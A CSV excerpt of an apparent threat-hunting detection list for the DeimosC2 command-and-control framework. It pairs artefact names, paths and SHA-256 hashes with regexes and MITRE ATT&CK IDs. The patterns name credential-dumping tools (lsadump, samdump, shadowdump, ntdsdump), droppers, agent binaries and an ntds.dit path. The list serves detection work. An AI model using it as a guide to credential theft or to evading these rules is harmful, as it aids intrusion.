"*/DeimosC2/tarball/*",".{0,1000}\/DeimosC2\/tarball\/.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63630"
"*/DeimosC2/zipball/*",".{0,1000}\/DeimosC2\/zipball\/.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63631"
"*/lsadump.elf*",".{0,1000}\/lsadump\.elf.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63632"
"*/lsadump.exe*",".{0,1000}\/lsadump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63633"
"*/lsassparse.py*",".{0,1000}\/lsassparse\.py.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63634"
"*/modules/credentialaccess/lsadump/server/*",".{0,1000}\/modules\/credentialaccess\/lsadump\/server\/.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#content","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63635"
"*/ntdsdump.exe*",".{0,1000}\/ntdsdump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63636"
"*/ondisk_dropper_tcp.pl*",".{0,1000}\/ondisk_dropper_tcp\.pl.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63637"
"*/ondisk_dropper_tcp.ps1*",".{0,1000}\/ondisk_dropper_tcp\.ps1.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63638"
"*/ondisk_dropper_tcp.py*",".{0,1000}\/ondisk_dropper_tcp\.py.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63639"
"*/ondisk_dropper_tcp.sh*",".{0,1000}\/ondisk_dropper_tcp\.sh.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63640"
"*/samdump.exe*",".{0,1000}\/samdump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63641"
"*/screengrab.elf*",".{0,1000}\/screengrab\.elf.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63642"
"*/screengrab.exe*",".{0,1000}\/screengrab\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63643"
"*/server/bin/minidump.elf*",".{0,1000}\/server\/bin\/minidump\.elf.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63644"
"*/server/bin/minidump.exe*",".{0,1000}\/server\/bin\/minidump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63645"
"*/shadowdump.elf*",".{0,1000}\/shadowdump\.elf.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63646"
"*/shadowdump.exe*",".{0,1000}\/shadowdump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63647"
"*/TCPAgent_Win_32_ARM.exe*",".{0,1000}\/TCPAgent_Win_32_ARM\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63648"
"*/TCPAgent_Win_32_Intel.exe*",".{0,1000}\/TCPAgent_Win_32_Intel\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63649"
"*/TCPAgent_Win_64_ARM.exe*",".{0,1000}\/TCPAgent_Win_64_ARM\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63650"
"*/TCPAgent_Win_64_Intel.exe*",".{0,1000}\/TCPAgent_Win_64_Intel\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63651"
"*\\Windows\\temp\\ntds.dit*",".{0,1000}\\\\Windows\\\\temp\\\\ntds\.dit.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#content","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63652"
"*\lsadump.exe*",".{0,1000}\\lsadump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63653"
"*\lsassparse.py*",".{0,1000}\\lsassparse\.py.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63654"
"*\ntdsdump.exe*",".{0,1000}\\ntdsdump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63655"
"*\ondisk_dropper_tcp.ps1*",".{0,1000}\\ondisk_dropper_tcp\.ps1.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63656"
"*\ondisk_dropper_tcp.py*",".{0,1000}\\ondisk_dropper_tcp\.py.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63657"
"*\ProgramData\nice.exe*",".{0,1000}\\ProgramData\\nice\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63658"
"*\samdump.exe*",".{0,1000}\\samdump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63659"
"*\screengrab.exe*",".{0,1000}\\screengrab\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63660"
"*\shadowdump.exe*",".{0,1000}\\shadowdump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63661"
"*\TCPAgent_Win_32_Intel.exe*",".{0,1000}\\TCPAgent_Win_32_Intel\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63662"
"*\TCPAgent_Win_64_ARM.exe*",".{0,1000}\\TCPAgent_Win_64_ARM\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63663"
"*\TCPAgent_Win_64_Intel.exe*",".{0,1000}\\TCPAgent_Win_64_Intel\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63664"
"*\Windows\temp\ntds.dit*",".{0,1000}\\Windows\\temp\\ntds\.dit.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63665"
"*044d2914795e5dc9378bd767a29f2deebdb32c8a2db415ac504c5428f81de131*",".{0,1000}044d2914795e5dc9378bd767a29f2deebdb32c8a2db415ac504c5428f81de131.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63666"
"*0c1d6b6f18811bda502df7302025950b189a75368185f9632ed96cc694ee4f8e*",".{0,1000}0c1d6b6f18811bda502df7302025950b189a75368185f9632ed96cc694ee4f8e.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63667"
"*1420de564b25985385c3209a398cabd80c5473848182a3e976732e91cbc40b9c*",".{0,1000}1420de564b25985385c3209a398cabd80c5473848182a3e976732e91cbc40b9c.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63668"
"*195a255225c246f360d80e4ac4287cbcd4ca8025a68631dfa3c28b365cd5a25c*",".{0,1000}195a255225c246f360d80e4ac4287cbcd4ca8025a68631dfa3c28b365cd5a25c.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63669"
"*1c9f784990a6ae66b1b7d2a08ae61c9368976dd76e9b72bd33869ea203b085ad*",".{0,1000}1c9f784990a6ae66b1b7d2a08ae61c9368976dd76e9b72bd33869ea203b085ad.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63670"
"*2e8341a042e4c26fa6cfe2606075a56aa47587b7ca934789da3cb486cca871b7*",".{0,1000}2e8341a042e4c26fa6cfe2606075a56aa47587b7ca934789da3cb486cca871b7.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63671"
"*3034d881af1372a28215e637e68b0ffebf04eb3276b63de033a0003af9d59b80*",".{0,1000}3034d881af1372a28215e637e68b0ffebf04eb3276b63de033a0003af9d59b80.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63672"
"*32d2e39edb2747db3ae9ba09bad40c8fa80ba2e3d7aefc1ea9613c4e83d01f67*",".{0,1000}32d2e39edb2747db3ae9ba09bad40c8fa80ba2e3d7aefc1ea9613c4e83d01f67.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63673"
"*3c3fa67b5e58473e215cb5544b6ec8ce39c7ca0d661751f9a21baaf383890e2d*",".{0,1000}3c3fa67b5e58473e215cb5544b6ec8ce39c7ca0d661751f9a21baaf383890e2d.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63674"
"*42bc3712059b3251b41d7bba811f74626e37f57cc1781d48b89793f9f9ba917f*",".{0,1000}42bc3712059b3251b41d7bba811f74626e37f57cc1781d48b89793f9f9ba917f.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63675"
"*569af95286b2d2043e4a095fa63d1b10691a76330c651665c9f8bbee6643ee27*",".{0,1000}569af95286b2d2043e4a095fa63d1b10691a76330c651665c9f8bbee6643ee27.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63676"
"*6bdd1093cd978498d0b18ae40e0f424b61d20eba23a2fd6aee81e1209e0984a9*",".{0,1000}6bdd1093cd978498d0b18ae40e0f424b61d20eba23a2fd6aee81e1209e0984a9.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63677"
"*7c46e89837f36cfecf76b21b4cb9847a273990baf740a4ac6c8a20a443a37d9d*",".{0,1000}7c46e89837f36cfecf76b21b4cb9847a273990baf740a4ac6c8a20a443a37d9d.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63678"
"*7fa888cebc08b2871fbbece2b445a754f5954f34519fe9dc581fbbaf061359bd*",".{0,1000}7fa888cebc08b2871fbbece2b445a754f5954f34519fe9dc581fbbaf061359bd.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63679"
"*8049e0849ef3516e367f830151bf520886d715d6be117665c5c199a9332a2353*",".{0,1000}8049e0849ef3516e367f830151bf520886d715d6be117665c5c199a9332a2353.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63680"
"*8807ad8abba7a1cf8776296b8909c6852cd9076388b881180bd985c16b46cc33*",".{0,1000}8807ad8abba7a1cf8776296b8909c6852cd9076388b881180bd985c16b46cc33.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63681"
"*98325ea7c7befdee51f22715eb8b5bbfe94aef5bb5ba247b7e13fb0aae55e156*",".{0,1000}98325ea7c7befdee51f22715eb8b5bbfe94aef5bb5ba247b7e13fb0aae55e156.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63682"
"*c:\\temp\\agent.exe*",".{0,1000}c\:\\\\temp\\\\agent\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#content","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63683"
"*c:\temp\agent.exe*",".{0,1000}c\:\\temp\\agent\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63684"
"*c18576336ad39854e79e8a06e194d2db2c0b6435eb4c13678e18950ba12d61b3*",".{0,1000}c18576336ad39854e79e8a06e194d2db2c0b6435eb4c13678e18950ba12d61b3.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63685"
"*cb72621b89c8a1d9686846183e86a09d7564d085927be2f483d739aeb60fcfdd*",".{0,1000}cb72621b89c8a1d9686846183e86a09d7564d085927be2f483d739aeb60fcfdd.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63686"
"*cc844f371e6ef11c23ec284542f8577b16ec132a705dda0054d1fb36cbbf9b2e*",".{0,1000}cc844f371e6ef11c23ec284542f8577b16ec132a705dda0054d1fb36cbbf9b2e.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63687"
"*cf654c92792fd8964025e9dd7dc2dc0181b15c4868134ec92ad4ac166dc99050*",".{0,1000}cf654c92792fd8964025e9dd7dc2dc0181b15c4868134ec92ad4ac166dc99050.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63688"
"*collectionhashcat_shadow.txt*",".{0,1000}collectionhashcat_shadow\.txt.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63689"
